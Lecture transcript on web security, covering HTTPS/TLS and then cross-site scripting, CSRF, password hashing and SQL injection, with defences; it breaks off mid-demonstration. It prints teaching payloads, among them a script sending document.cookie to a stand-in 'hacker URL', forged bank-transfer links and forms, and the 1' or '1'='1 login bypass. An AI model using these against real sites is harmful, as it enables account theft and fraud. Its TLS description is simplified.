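```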
But HTTP is not encrypted.
And so if we think about
making a request to a server,
if we're the client
on the left and we're
making a request to a server on the
right, it might go something like this.
Because the odds are pretty low
that, if we're making a request,
we are so close to the
server that would serve
that request to us that
it wouldn't need to hop
through any routers along the way.
Remember, routers,
their purpose in life is
to send traffic in the right direction.
And they contain a table
of information that says,
oh, if I'm making a request
to some server over there,
then the best path is to go here,
and then I'll send it over there,
and then it will send it there.
Their job is to optimize
and find the best path
to get the request to
where it needs to be.
So if I'm initiating a request
to, as the client, the server,
it's going to first go
through router A who's
going to say, OK, I'm going to
move it closer to the server
so that it receives that request,
goes to router B, goes to router C.
And eventually router C perhaps
is close enough to the server
that it can just hand
off the request directly.
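The hop-by-hop forwarding just described can be modeled as each router consulting a next-hop table. The router names and table entries here are hypothetical, matching the A, B, C example; real routing tables map address prefixes, not names.

```python
# Toy model of routers' forwarding tables: for a given destination,
# which neighbor does each router hand the packet to next?

FORWARDING = {
    "router-A": {"server": "router-B"},
    "router-B": {"server": "router-C"},
    "router-C": {"server": "server"},  # close enough to deliver directly
}

def route(start, destination):
    """Follow next-hop entries until the packet reaches its destination."""
    hops, current = [start], start
    while current != destination:
        current = FORWARDING[current][destination]
        hops.append(current)
    return hops

print(route("router-A", "server"))
# ['router-A', 'router-B', 'router-C', 'server']
```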
The server's then going to get
that request, read it as HTTP/1.1,
look at all the other metadata inside of
the request to see if there's anything
else that it's being asked for, and
then it's going to send the information
back.
And in this example
I'm having it go back
exactly through the same chain
of routers but in reverse.
But in reality, that might be different.
It might not go through
the exact same three
routers in this example in reverse.
It might actually take an entirely different sequence of routers back, depending on traffic that's happening on the network, how congested things are, and whether a better path has emerged in the amount of time it took to process the request that I asked for.
But remember, HTTP, not secured.
Not encrypted.
This is plain,
over-the-air communication.
We saw previously, when we
took a look at a screenshot
from a tool called
Wireshark, that it's not
that difficult on an unsecured network
using an unsecured protocol to read,
literally, the contents of
those packets going to and from.
So that's a vulnerability here for sure.
Another vulnerability is
any one of these computers
along the way could be compromised.
So for example, router
A perhaps was infected
by somebody who-- a router
is just a computer as well.
So perhaps it was
infected by an adversary
with some worm that will eventually
make it part of some botnet,
and it'll eventually start
spamming some server somewhere.
If router A is compromised in such a
way that an adversary can just read all
the traffic that flows
through it-- and again,
we're sending all of our traffic
in an unencrypted fashion--
then we have another security
loophole to deal with.
So HTTPS resolves this problem
by securing or encrypting
all of the communications
between a client and a server.
So HTTP requests go to one port. We talked about that already. They go to port 80 by convention. HTTPS requests go to port 443 by convention.
In order for HTTPS to work, the server is responsible for providing or possessing what's called a valid SSL or TLS certificate.
SSL is actually a
deprecated technology now.
It's been subsumed into TLS.
But typically these things are still
referred to as SSL certificates.
And perhaps you've seen a
screen that looks like this when
you're trying to visit some website.
You get a warning that your
connection is not private.
And at the very end of
that warning, you are
informed that the cert date is invalid.
Basically this just means that
their SSL certificate has expired.
Now, what is an SSL certificate?
So there are services that work
alongside the internet called
certificate authorities.
And like GlobalSign, for example,
from whom I borrowed the screenshots--
GoDaddy, who is also a very
popular domain name provider,
is also a certificate authority.
And what they do is they verify that a particular website owns a particular public key, which has a corresponding private key. And the way they do that is the website digitally signs something and sends it to the certificate authority.
The certificate authority then goes
through those exact same checks
that we've seen before
for digital signatures
to verify that, yes, this
person must own this public key.
And the idea for this
is we're trusting that,
when I send a communication
to you as the website
owner using the public key that you
say is yours, then it really is yours.
There really is somebody out
there or some third party
that we've decided to collectively
trust, the certificate authority, who
is going to verify this.
Now, why does this matter?
Why do we need to verify that someone's
public key is what they say it is?
Well, it turns out that this
idea of asymmetric encryption,
or public and private key cryptography
that we've previously discussed,
does form part of the core of HTTPS.
But as we'll see in a moment, we don't
actually use public and private keys
to communicate except at the very,
very beginning of our interaction
with some site when we are using HTTPS.
So the way this really
happens underneath the hood
is via the secure sockets layer, SSL, which is now part of the overall transport layer security, or TLS, protocol.
There's other things that are folded
into it, but SSL is part of it.
And this is what happens.
When I am requesting a page from
you, and you are the server,
and I am requesting this
via HTTPS, I am going
to initially make a request using
the public key that I believe
is yours because the
certificate authority has
vouched for you, saying that I would like to make an encrypted request.
And I don't want to send
that request over the air.
I don't want to send that in the clear.
I want to send it to you using the
encryption that you say is yours.
So I send a request to you,
encrypting it using your public key.
You receive the request.
You decrypt it using your private key.
You see, OK, I see now that Doug
wants to initiate a request with me,
and you're going to fulfill the request.
But you're also going
to do one other thing.
You're going to set a key.
And you're going to
send me back a key, not
your public or private key, a different
key, alongside the request that I made.
And you're going to send it
back to me using my public key.
So the initial volley of communications
back and forth between us
is the same as any other
encrypted communication
using public and private keys
that we've previously seen.
I send a message to you
using your public key.
You decrypt it using your private key.
You respond to me using my public key,
and I decrypt it using my private key.
But this is really slow.
If we're just having communications back
and forth via mail or even via text,
the difference of a few
milliseconds is immaterial.
We don't really notice it.
But on the web, we do
notice it, especially
if we're making multiple
requests or there's
multiple packets going back and
forth and every single one of them
needs to be encrypted.
So beyond this initial volley,
public and private key encryption
is no longer needed because it's no
longer used, because it's too slow.
We would notice it if we did.
Instead, as I mentioned, the server
is going to respond with a key.
And that key is the key to a cipher.
And we've talked about ciphers before
and we know that they are reversible.
The particular cipher in question
here is something called AES.
But it is just a cipher.
It is reversible.
And the key that you
receive is the key that you
are supposed to use to decrypt
all future communications.
This key is called the session key.
And you use it to decrypt
all future communications
and use it to encrypt all future
communications to the server
until the session,
so-called, is terminated.
And the session is basically
as long as you're on the site
and you haven't logged
out or closed the window.
That is the idea of a session.
It is one singular
experience with a page
or with a set of pages that are all part of the same domain name.
We're just going to use a cipher for
the rest of the time that we talk.
Now, this may seem
insecure for reasons we've
talked about when we
talked about ciphers
and how they are inherently flawed.
Recall that when we were talking about
some of the really early ciphers,
those are classic ciphers
like Caesar and Vigenere,
those are very easy to break.
AES is much more complex than that.
And the other upside is that
this key, like I mentioned,
is only good for a session.
So in the unlikely event that the server chooses a bad key-- for example, if we think about it as if it were Caesar, a key of zero, which doesn't actually shift the letters at all, would be a very bad key-- even if the key is compromised, it's only good for a particular session.
That's not a very long amount of time.
But the upside is the
ability to encipher
and decipher information is much faster.
If it's reversible, it's pretty quick
to do some mathematical manipulation
and transform it into something
that looks obscured and gibberish
and to undo that as well.
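The essential property being described-- a fast, reversible cipher keyed by a shared session key-- can be illustrated with a toy XOR cipher. To be clear, this is not AES, and it is not secure; it only demonstrates the encrypt/decrypt symmetry that makes symmetric session encryption so fast.

```python
# Toy reversible cipher: XOR each byte with a repeating key.
# Applying the same operation twice with the same key recovers the
# original. AES has this same symmetry but is vastly more complex.

def xor_cipher(data: bytes, key: bytes) -> bytes:
    """XOR data against the key; running it twice undoes it."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

session_key = b"not-a-real-session-key"  # placeholder, not a real key
message = b"GET /account HTTP/1.1"

ciphertext = xor_cipher(message, session_key)    # fast to encipher...
plaintext = xor_cipher(ciphertext, session_key)  # ...and to decipher
print(plaintext == message)  # True
```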
And so even though public and private key encryption is considered effectively unbreakable, to the point that it's mathematically untenable to crack a message encrypted with it, we don't rely on it for SSL because it is impractical to expect communications to go that slowly.
And so we do fall back on these ciphers.
And that really is when you're using
secured encrypted communication
via HTTPS.
You're just relying
on a cipher that just
happens to be a very, very fancy
cipher that should hypothetically
be very difficult to figure
out the key to as well.
You may have also seen a few changes
in your browser, especially recently.
This screenshot shows
a couple of changes
that are designed to warn you when
you are not using HTTPS encryption.
And it's not necessary to use
HTTPS for every interaction you
have on the internet.
For example, if you are going to a
site that is purely informational,
it's just static content, it's just a
list of information, there's no login,
there's no buying, there's no clicking
on things that might then get tracked,
for example, it's not really
necessary to use HTTPS.
So don't necessarily be alarmed if you visit a site and you're warned it's not secure.
We're told that over time this will
turn red and become perhaps even
more concerning as more
versions of this come out
and as more and more adopters
of HTTPS exist as well.
But you're going to start
getting notifications.
And you may have seen
these as well in green.
If you are using HTTPS and
you log into something,
you'll see a little lock icon here
and you'll be told that it is secure.
And again, this is just
because human beings
tend not to be as concerned
about their digital privacy
and their digital security
when using the internet.
And now the technology is
trying to provide clues and tips
to entice you to be more
concerned about these things.
Now let's take a look
at a couple of attacks
that are derived from
things we typically consider
to be advantages of using the internet.
The first of these is the idea
of cross-site scripting, XSS.
We've previously discussed
this idea of the distinction
between server-side code
and client-side code.
Client-side code, recall, is
something that runs locally
on our computer where
our browser, for example,
is expected to interpret
and execute that code.
Server-side code is run on the server.
And when we get
information from a server,
we're not getting back
the actual lines of code.
We're getting back the output of that
code having run in the first place.
So for example, there might be some code
on the server, some Python code or PHP
code that generates HTML for us.
The actual Python or PHP code in this
example would be server-side code.
We don't actually ever see that code.
We only see the output of that code.
A cross-site scripting vulnerability exists when an adversary is able to trick a client's browser into running something locally.
And it will do something that
presumably the person, the client,
didn't actually intend to do.
Let's take a look at an example
of this using a very simple web
server called Flask.
We have here some Python code.
And don't be too worried if this
doesn't all make sense to you.
It's just a pretty short, simple
web server that does two things.
So this is just some
bookkeeping stuff in Flask.
And Flask is a package of Python
that is used to create web servers.
This web server has two
things, though, that it does.
The first is when I visit
slash on my web server--
so let's say this is Doug's site.
If I go to dougspage.com, which you may
not actually explicitly type anymore
but most browsers just
add it, slash just
means the root page of your server.
I'm going to call the following
function whose name happens
to be called index in this case.
Return hello world.
And what this basically means
is if I visit dougspage.com/,
what I receive is an HTML page
whose content is just hello world.
So it's just an HTML file
that says hello world.
Again, this code here
is all server-side code.
You don't actually see this code.
You only see the output of this
code, which is this here, this HTML.
It's just a simple string
in this case, but it would
be interpreted by the browser as HTML.
If, however, I get a 404-- a 404 is a not found error; it means the page I requested doesn't exist. And since I've only defined the behavior for literally one page, slash, the index page of my server, then I want to call this function, not found.
Return not found plus whatever
page I tried to visit.
So it basically is another very simple
page, much like hello world here,
where instead of saying hello
world, it says not found.
And then it also concatenates onto
the very end of that whatever page
I tried to visit.
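The two handlers just described can be sketched in pure Python, stripped of the Flask plumbing (the real version would use Flask's @app.route and @app.errorhandler decorators; the function names follow the lecture's description).

```python
# Sketch of the lecture's two handlers, without the Flask decorators.

def index():
    # What you'd get back visiting the root page, dougspage.com/
    return "Hello, world"

def not_found(path):
    # Vulnerable: the user-supplied path is concatenated straight into
    # the HTML response with no escaping whatsoever.
    return "Not found " + path

print(not_found("/foo"))  # Not found /foo
```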
This is a major cross-site
scripting vulnerability.
And let's see why.
Let's imagine I go to /foo, so dougspage.com/foo.
Recall that our error handler function,
which I've reproduced down here,
will return not found /foo.
Seems pretty reasonable.
It seems like the behavior I
expected or intended to have happen.
But what about if I go
to a page like this one?
So this is what I literally type in the browser: dougspage.com/<script>alert('hi')</script>.
This script here looks a lot like HTML.
And in fact, when the browser sees
this, it will interpret it as HTML.
And so what I will get returned by visiting this page is not found and then everything here except for the leading slash, which means
that when I receive this and my
client is interpreting the HTML,
I'm going to generate an alert.
What is an alert?
Well, if you've ever gone to a
website and had a pop-up box display
some information, you have to
click OK or click X to make
it go away, that's what an alert is.
So by visiting this page on my website, I've actually tricked my browser into giving me a JavaScript alert, or tricked the browser of whoever visits this page into giving a JavaScript alert.
So that's probably not
exactly a good thing.
But it can get a little bit
more nefarious than that.
Let's instead imagine-- instead
of having this be on my server,
it might be easier to imagine it
like this, that this is what I wrote.
This script tag here's what I wrote
into my Facebook profile, for example.
So Facebook gives you the ability
to write a short little bio
about yourself.
Let's imagine that my bio was this
script document.write, image source,
and then I have a hacker
URL and everything.
And imagine that I own hacker URL.
So I own hacker URL and I wrote
this in my Facebook profile.
Assuming that Facebook did not
defend against cross-site scripting
attacks, which they do, but
assuming that they did not,
anytime somebody visited
my profile, their browser
would be forced to contend
with this script tag here.
Why?
Because they're trying
to visit my profile page.
My profile page contains
literally these characters which
are going to be interpreted as HTML.
And it's going to add document.write--
that's a JavaScript way of saying add
the following line in addition
to the HTML of the page--
image source equals hacker
url?cookie= and then document.cookie.
So imagine that I, again,
control hacker URL.
Presumably, as somebody
who is running a website,
I also maintain logs of every time
somebody tries to access my website,
what page on my site
they're trying to visit.
If somebody goes to my Facebook
profile and executes this,
I'm going to get notified via my hacker
URL logs that somebody has tried to go
to that page ?cookie=
and then document.cookie.
Now, document.cookie in
this case, because this
exists on my Facebook profile, is
an individual's cookie for Facebook.
So here what I am
doing-- again, Facebook
does defend against
cross-site scripting attacks,
so this can't actually
happen on Facebook.
But assuming that they did not
defend against them adequately,
what I'm basically doing
is getting told via my log
that somebody tried to
visit some page on my URL,
but the page that they
tried to visit, I'm
plugging in and basically stealing
the cookie that they use for Facebook.
And a cookie, recall, is
sort of like a hand stamp.
It's basically me, instead
of having to re-log
into Facebook every time I want
to use it, going up to Facebook
and saying, here.
You've already verified my identity.
Just take a look at
this, and you get let in.
And now I hypothetically know
someone else's Facebook cookie.
And if I was clever, I
could try and use that
to change what my Facebook cookie
is to that person's Facebook cookie.
And then suddenly I'm able to log in
and view their profile and act as them.
This image tag here
is just a clever trick
because the idea is that it's trying
to pull some resource from my site.
It doesn't exist.
I don't have a list of all
the cookies on Facebook.
But I'm being told that somebody is
trying to access this URL on my site.
So the image tag is just
sort of a trick to force
it to log something on my hacker URL.
But the idea here is that I would be able to steal somebody's Facebook cookie anywhere this attack is not well-defended against.
So what techniques can we
use either for our own sites
when we are running to avoid
cross-site scripting vulnerabilities
or to protect against cross-site
scripting vulnerabilities?
The first technique that we can
use is to sanitize, so to speak,
all of the inputs that
come in to our page.
So let's take a look at how
exactly we might do this.
So it turns out that
there are things called
HTML entities, which are other ways of
representing certain characters in HTML
that might be considered special or control characters-- things like, for example, the left and right angle brackets.
Typically, when a browser
sees a character left
angle bracket or right
angle bracket, it's
going to automatically interpret that as
some HTML that it should then process.
So in the example I just
showed a moment ago,
I was using the fact that whenever
it sees angle brackets with script
around it, they're going to
try and interpret whatever
is between those tags as a script.
One way for me to prevent that
from being interpreted as a script
is to call this or call this something
else other than just left angle bracket
and right angle bracket.
And it turns out that there are these
things called HTML entities that
can be used to refer to
these characters instead,
such that if I sanitize
my input in such a way
that every time somebody literally
typed the character left angle bracket,
I had written some code that
automatically took that and changed it
into &lt;.
And then every time somebody
wrote a greater than character,
or right angle bracket, I changed
that in the code to &gt;.
Then when my page was responsible for
processing or interpreting something,
it wouldn't interpret this-- it would
still display this character as a left
angle bracket or less than-- that's
what the lt stands for here--
or a right angle bracket, greater than.
That's what the gt stands for there.
It would literally just show those
characters and not treat them as HTML.
So that's the idea of what it means
to sanitize input when we're talking
about HTML entities, for example.
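Python's standard library can do this sanitization for us: html.escape converts angle brackets (and also ampersands and quotes) into their HTML entities, so the browser displays them as literal characters instead of interpreting them as tags.

```python
import html

# The malicious path from the earlier example, before and after escaping.
unsafe = "/<script>alert('hi')</script>"
safe = html.escape(unsafe)

print(safe)
# /&lt;script&gt;alert(&#x27;hi&#x27;)&lt;/script&gt;
# The browser now renders these as literal characters, not as a script.
```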
Another thing that we could do is
just disable JavaScript entirely.
This would have some
upsides and some downsides.
The upside is you're pretty protected
against cross-site scripting
vulnerabilities because they're usually
going to be introduced via JavaScript.
The downside is JavaScript
is pretty convenient.
It's nice.
It makes for a better user experience.
Sometimes there might
be parts of our page
that just don't work if
JavaScript is completely disabled,
and so trade-offs there.
You're protecting yourself,
but you might be doing
other sorts of non-material damage.
Or we could decide to just handle
the JavaScript in a special way.
So for example, we
might not allow what's
called inline JavaScript, for
example, like the script tags
that I just showed a moment ago.
But we might allow JavaScripts
written in separate JavaScript files
which can also be linked
into your HTML pages.
So those would be allowed, but inline
JavaScript, like what we just saw,
would not be allowed.
We could sandbox the JavaScript and run it separately somewhere else first to see if it does anything suspicious, and only if it doesn't, then allow it to be displayed.
We could also enforce a content security policy.
Content security policy
is another header
that we can add to our HTML
pages or HTTP responses.
And we can define certain
behavior to happen
such that will allow certain lines or
certain types of JavaScript through
but not others.
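As an illustration, a policy header like the one below (the values are just an example, not a universal recommendation) blocks inline scripts like the ones we've seen, while still allowing script files loaded from the site's own origin:

```
Content-Security-Policy: default-src 'self'; script-src 'self'
```

With script-src 'self', browsers refuse to run inline <script> blocks by default, which is exactly the distinction between inline and separately linked JavaScript described a moment ago.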
Now, there's another
type of attack that can
be used that relies heavily on the fact
that we use cookies so extensively,
and that is a cross-site
request forgery, or a CSRF.
Now, cross-site scripting attacks generally
involve receiving some content
and the client's browser
being tricked into doing something
locally that it didn't want to do.
In a CSRF attack, the trick is we're relying on the fact that there is a cookie that can be exploited to make an outbound HTTP request that we did not intend to make.
And again, this relies
extensively on cookies
because they are this shorthand,
short-form way to log into something.
And we can make a fraudulent
request appear legitimate
if we can rely on someone's cookie.
Now, again, if you ever use
a cloud service for example,
they're going to have CSRF
defenses built into them.
This is really if you're
building a simple site
and you don't defend against this.
Flask, for example, does not defend
against this particularly well,
but Flask is a very simple
web framework for servers.
They're generally going to be much more complicated than that and have much more additional functionality to be more full-featured.
So let's walk through what
these cross-site request
forgeries might look like.
And for context, let's imagine
that I send you an email
asking you to click on some URL.
So you're going to click on this link.
It's going to redirect you to some page.
Maybe that page looks
something like this.
It's pretty simple,
not much going on here.
I have a body.
And inside of it I have one more link.
And the link is http://hackbank.com/transfer?to=doug&amt=500.
Now, perhaps you don't hover over it
and see the link at the beginning of it.
But maybe you are a
customer of Hack Bank.
And maybe I know that you're a customer
of Hack Bank such that if you click
on this link and if you happen to be
logged in, and if you happen to have
your cookie set for hackbank.com, and
this was the way that they actually
executed transfers, by having you go
to /transfer and say to whom you want
to send money and in what amount--
And fortunately, most banks
don't actually do this.
Usually, if you're going to do something
that manipulates the database, as this
would, because it's going to be
transferring some amount of money
somewhere that would be
via HTTP POST request--
this is just a straightforward
GET request I'm making here.
If you were logged in,
though, to Hack Bank,
or if your cookie for Hack Bank was set
and you clicked on this link,
hypothetically, a transfer of $500--
again, assuming that
this was how you did it,
you specified a person and
you specified an amount--
would be transferred from your
account to presumably my account.
That's probably not
something you intended to do.
So that would be an example of why
this is a cross-site request forgery.
It's a legitimate request.
It appears that you intended to
do this because it came from you.
It's using your cookie.
But you didn't actually
intend for it to happen.
Here's another example.
You click on the link in my email
and you get brought to this page.
So there's not actually even a
second link to click anymore.
Now it's just trying to load an image.
Now, looking at this URL, we can
tell there's not an image there.
It doesn't end in .jpg or .png or the like.
It's the same URL as before.
But my browser sees image source
equals something and says,
well, I'm at least going
to try and go to that URL
and see if there is an
image there to load for you.
Again, you just click on
the link in the email.
This page loads.
My browser tries to go to this
page, or your browser in this case
tries to go to this page
to load the image there.
But in so doing, it's, again,
executing this unintended transfer,
relying on your cookie at hackbank.com.
Another example of this might be a form.
So again, it appears that you
click on the link in the email.
You get brought to a form that just has
now just a button at the bottom of it
that says Click Here.
And the reason it just
has a button, even
though there's other stuff written, is
that those first two fields are hidden.
They are type equals hidden,
which means you wouldn't actually
see them when you load your browser.
Now, contrast this, for
example, with a field
whose type is text, which you might
see if you're doing a straightforward
login.
You would type characters in and
see the actual characters appear.
That's text versus a password
field where you would
type characters in and see all stars.
It would visually
obscure what you typed.
The action of this form-- that is, what happens when you click on the Submit button at the bottom-- is the same as before. It's hackbank.com/transfer.
And then I'm using these parameters here: to Doug, the amount of $500, and the Click Here button.
Notice also that now I actually am using a POST request to try to initiate this transfer, again assuming that this was how Hack Bank structured transfer requests.
So if you clicked here and this
was otherwise validly structured
and you were logged in, or your
cookie was valid for Hack Bank,
then this would initiate
a transfer of $500.
And I can play another similar trick to
what I did a moment ago with the image
by doing something like this
where, when the page is loaded,
instantly submit this form.
So you don't even have
to click here anymore.
It's just going to go
through the document,
document being JavaScript's way of
referring to the entire web page,
find the first form, forms[0], assuming this is the first form on the page, and just submit it.
Doesn't matter what else is going on.
Just submit this form.
That would also initiate transfer if
you clicked on that link from my email.
So a quick summary of these
two different types of attacks.
Cross-site scripting
attacks, the adversary
tricks you into executing code on
your browser to do something locally
that you probably did not intend.
And a cross-site request
forgery, something
that appears to be a legitimate
request from your browser
because it's relying on cookies, you're ostensibly logged in in that way,
but you don't actually
mean to make that request.
Now let's talk about a
couple of vulnerabilities
that exist in the context
of a database, which I
know you've discussed recently as well.
So imagine that I have a
table of users on my database
that looks like this, that each of them
has an ID number, they have a username,
and they have a password.
Now, the obvious
vulnerability here is I really
shouldn't be storing my users'
passwords like this in the clear.
If somebody were to ever hack and
get a hold of this database file,
that's really, really bad.
I am not taking best practices to
protect my customers' information.
So I want to avoid doing that.
So instead what I might do, as we've
discussed, is hash their passwords,
run them through some hash function
so that when they're actually stored,
they get stored looking
something like this.
You have no idea what the
original password was.
And because it's a
hash, it's irreversible.
You should not be able
to undo what I did
when I ran through the hash function.
But there's actually still
a vulnerability here.
And the vulnerability
here is not technical.
It's human again.
And the vulnerability that
exists here is that we see--
we're using a hash function,
so it's deterministic.
When we pass some data through it, we're
going to get the same output every time
we pass data through it.
And two of our users, Charlie
and Eric, have the same hash.
This makes sense,
because if we go back a moment,
they also had the same actual password
when it was stored in plain text.
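The determinism problem just described can be sketched in Python. Note that SHA-256 is an assumption here; the lecture doesn't name a specific hash function, and any deterministic hash behaves the same way:

```python
import hashlib

def hash_password(password):
    # Deterministic: the same input always yields the same digest.
    # SHA-256 is an assumption; the lecture doesn't name the hash.
    return hashlib.sha256(password.encode()).hexdigest()

# Charlie and Eric chose the same password, so their stored hashes
# come out identical, which is visible to anyone who steals the
# database file, even though the passwords themselves are hidden.
charlie = hash_password("password")
eric = hash_password("password")
print(charlie == eric)  # True
```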
We've gone out of our way to try and
defend against that by hashing it.
But somebody who gets a hold of
this database file, for example,
they hack into it, they get it, they'll
see two people have the same password.
And maybe this is a very
small subset of my user base.
And maybe there's hundreds
of thousands of people.
And maybe 10% of them
all have the same hash.
Well, again, human beings, we are not
the best at defending our own stuff.
It's a sad truth that
the most common password
is password followed by some of these
other examples we had a second ago.
All of these are pretty bad passwords.
They're all on the list of some of
the most commonly used passwords
for all services, which means
that if you see a hash like this,
it doesn't matter that
we have taken steps
to protect our users against this.
If we see a hash like this many, many
times in our database, a clever hacker,
a clever adversary
might think, oh, well,
I'm seeing this hash 10% of the time,
so I'm going to guess that Charlie's
password for the service is 12345
and they're wrong.
And then they'll maybe try abcdef
and they're wrong, and then maybe try
password and they're right.
And then all of a sudden every
time they see that hash, they
can assume that the password is password
for every single one of those users.
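That guessing strategy is just a small dictionary attack, and it can be sketched in a few lines. The guess list and the SHA-256 hash are both illustrative assumptions:

```python
import hashlib

def hash_password(password):
    # SHA-256 is an assumption; any deterministic hash works the same way.
    return hashlib.sha256(password.encode()).hexdigest()

def crack(target_hash, guesses):
    # Try each common password in turn; if its hash matches the
    # stolen hash, the original password is revealed.
    for guess in guesses:
        if hash_password(guess) == target_hash:
            return guess
    return None

common = ["12345", "abcdef", "password"]  # hypothetical guess list
stolen = hash_password("password")        # a hash seen many times in the dump
print(crack(stolen, common))              # prints: password
```

Once one match is found, every other row with that same hash falls at the same time, which is exactly the danger described above.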
So again, nothing we can do as
technologists to solve this problem.
This is really just
getting folks to understand
that using different passwords,
using non-standard passwords,
is really important.
That's why we talked about password
managers and maybe not even knowing
your own passwords in a prior lecture.
There's another problem that can exist,
though, with databases, in particular,
when we see screens like this.
So this is a contrived login screen
that has a username and password field and a Forgot Password button whose purpose in life is, if you type in your email address, which is the username in this case, and you have the Forgot Password box checked, and you try and click Login, instead of actually logging you in, it's going to email you a link to change your password, hopefully, and not your actual password, for reasons we previously discussed as well.
But what if when we click
on this button we see this?
OK.
We've emailed you a link
to change your password.
Does that seem inherently problematic?
Perhaps not.
But what about if you see this as well?
Somebody might see this if
they're logged in as well.
Sorry, no user with that email address.
Does that perhaps seem problematic
when you compare it against this?
This is an example of something
called information leakage.
Perhaps an adversary has
hacked some other database
where folks were not being
as secure with credentials.
And so they have a whole set of email
addresses mapped to credentials.
And because human beings tend
to reuse the same credentials
on multiple different services,
they are trying different services
that they believe that
these users might also
use using those same username
and password combinations.
If this is the way that we field these
types of forgot password inquiries,
we're revealing some
information potentially.
If Alice is a user, we're now
saying, yes, Alice is a user of this.
Try this password.
If we get something like this, then
the adversary might not bother trying.
They've realized, oh, Alice
is not a user of this service.
And even if they're not trying to hack
into it, if we do something like this,
we're also telling that adversary
quite a bit about Alice.
Now we know Alice uses this service,
and this service, and this service,
and not this service.
And they can sort of create a
picture of who Alice might be.
They're sort of using her digital
footprint to understand more about her.
A better response in this case
might be to say something like this,
request received.
If you're in our system, you'll receive
an email with instructions shortly.
That's not tipping
our hand either way as
to whether the user is in the
database or not in the database.
No information leakage here,
and generally a better way
to protect our customers' privacy.
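The uniform-response idea can be sketched like this. The function and helper names are hypothetical, not from any particular framework:

```python
def handle_forgot_password(email, registered_users):
    # Do the real work only when the account exists, but always
    # return the exact same message, so the response leaks nothing
    # about whether the email is in the database.
    if email in registered_users:
        send_reset_email(email)
    return ("Request received. If you're in our system, "
            "you'll receive an email with instructions shortly.")

def send_reset_email(email):
    # Stub standing in for real email delivery.
    pass

print(handle_forgot_password("alice@example.com", {"alice@example.com"}))
print(handle_forgot_password("mallory@example.com", {"alice@example.com"}))
# Both calls print the identical message.
```

An adversary probing with stolen email addresses learns nothing from the response either way.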
Now, that's not the only problem
that we can have with databases.
We've alluded to this
idea of SQL injection.
And there's this comic that makes the rounds quite a bit when we talk about SQL injection, from a webcomic called XKCD, that involves a SQL injection attack, which is basically providing some text or some query to a database where that query actually does something unintended.
It actually itself is SQL as opposed
to just plugging in some parameter,
like what is your name, and then
searching the database for that name.
Instead of giving you my
name, I might give you
something that is actually
a SQL query that's
going to be executed that
you don't want me to execute.
So let's see an example
of how this might work.
So here's another simple
username and password field.
And in this example, I've written my
password field poorly intentionally
for purposes of the example
so that it will actually
show you the text that is
typed as opposed to showing
you stars like a password field should.
So this is something that the user
sees when they access my site.
And perhaps on the back end in the
server-side code, inside of Python
somewhere I have written a SQL
query that looks like the following.
When the login button is clicked,
execute the following SQL query.
SELECT star from users where
username equals uname--
and uname here in yellow referring
to whatever was typed in this box--
and password equals
pword, where, again, pword
is referring to whatever
was typed in this box.
So we're doing a SQL query
to select star from users,
get all of the information
from the users table
where the username equals
whatever they typed in that box
and the password equals
whatever they typed in that box.
And so, for example,
if I have somebody who
logs in with the username
Alice and the password
12345, what the query would actually
look like with these values plugged
into it might look something like this;
SELECT star from users where username
equals Alice and password equals 12345.
If there is nobody with username Alice
or Alice's password is not 12345,
then this will fail.
Both of those conditions
need to be true.
But what about this?
Someone whose username is hacker and
their password is 1' or '1' equals '1.
That looks pretty weird.
And the reason that
that looks pretty weird
is because this is an
attempt to inject SQL,
to trick SQL into doing something that
is presumably not intended by the code
that we wrote.
Now, it probably helps to take a
look at it plugging the data in
to see what exactly this is going to do.
SELECT star from users where username equals hacker and password equals '1' or, and so on and so on.
Maybe I do have a person whose
username actually is hacker,
but that's probably not their password.
That doesn't matter.
I'm still going to be
able to log in if I
have somebody whose username is hacker.
And the reason for that
is because of this or.
I have sort of short circuited
the end of the SQL query.
I have this quote mark that demarcates
the end of what the user presumably
typed in.
But I've actually literally
typed those into my password
to trick SQL such that if
hacker's password equals 1,
it just happens to literally be the
character 1, OK, I have succeeded.
I guess that's a really bad password, and I shouldn't be able to log in that way, but maybe that is the case and I'm able to log in.
But even if not, this
other thing is true.
'1' does equal '1'.
So as long as somebody whose username
is hacker exists in the database,
I am now able to log in as
hacker because this is true.
This part's probably not true, right?
It's unlikely that their password is 1.
Regardless of what their password
is, this part actually is true.
It's a very simple SQL injection attack.
I'm basically logging in as someone
who I'm presumably not supposed
to be able to log in as, but it
illustrates the kind of thing
that could happen.
You are allowing people
to bypass logins.
Now, it could get worse if your
database administrator username
is admin or something very common.
The default for this is typically admin.
This would potentially
give people the ability
to be database
administrators, that they're
able to execute exactly this
kind of trick on the admin user.
Now they have administrative
access to your database, which
means they can do things like
manipulate the data in the database,
change things, add things, delete things
that you don't want to have deleted.
And in the case of a database,
deletion is pretty permanent.
You can't undo a delete most of the time in a database the way you might be able to with other files.
Now, are there techniques to
avoid this kind of attack?
Fortunately, there are.
Right now I'd just like to take a look at a very simple Python
program that replicates
the kind of thing
that one could do in a more
robust, more complex SQL situation.
So let's pull up a program
here where we're just
simulating this idea
of a SQL injection just
to show you how it's not that
difficult to defend against it.
So let's pull up the code
here in this file login.py.
So there's not that much going on here.
I have x equals input username.
So x, recall, is a Python variable.
And input username is basically going
to prompt the user with the string
username and then expect them
to type something after that.
And then we do exactly the
same thing with password
except storing the result there in y.
So whatever the user types after
username will get stored in x.
Whatever they type after
password will get stored in y.
And then here I'm just going to print.
And in the SQL context, this would be
the query that actually gets executed.
So imagine that that's
what's happening instead.
SELECT star from users where username equals, and then this symbol here, '{x}'.
What I'm doing here is just
using a Python-formatted string.
That's what this f
here-- it's not a typo--
at the beginning means, is I'm going to
plug in whatever the person, the user,
typed at the first prompt,
which I stored in x here,
and whatever the user typed at the second prompt, which is stored in y there.
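The program just described might look something like this. This is a sketch: the interactive prompts are factored into a function so the query-building step is easy to see, and the query is only printed, never actually run against a database:

```python
def build_query(x, y):
    # Naive string interpolation, exactly as described above: whatever
    # the user typed is pasted straight into the SQL string, which is
    # what makes this injectable.
    return f"SELECT * FROM users WHERE username = '{x}' AND password = '{y}'"

# An ordinary login attempt:
print(build_query("Doug", "12345"))
# SELECT * FROM users WHERE username = 'Doug' AND password = '12345'

# The adversary's input from a moment ago:
print(build_query("Doug", "1' or '1' = '1"))
# SELECT * FROM users WHERE username = 'Doug' AND password = '1' or '1' = '1'
```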
So let's actually just run this program.
So let's pop open here for a second.
The name of this program is
login.py, so I'm going to type python
login.py, Enter.
Username, Doug.
Password, 12345.
And then the query, hypothetically, that
would get executed if I constructed it
in this way is SELECT star
from users where username
equals Doug and password equals 12345.
Seems reasonable.
But if I try and do the adversary
thing that I did a moment ago,
username equals Doug, password
equals 1' or '1' equals '1, with no final single quote, and I hit
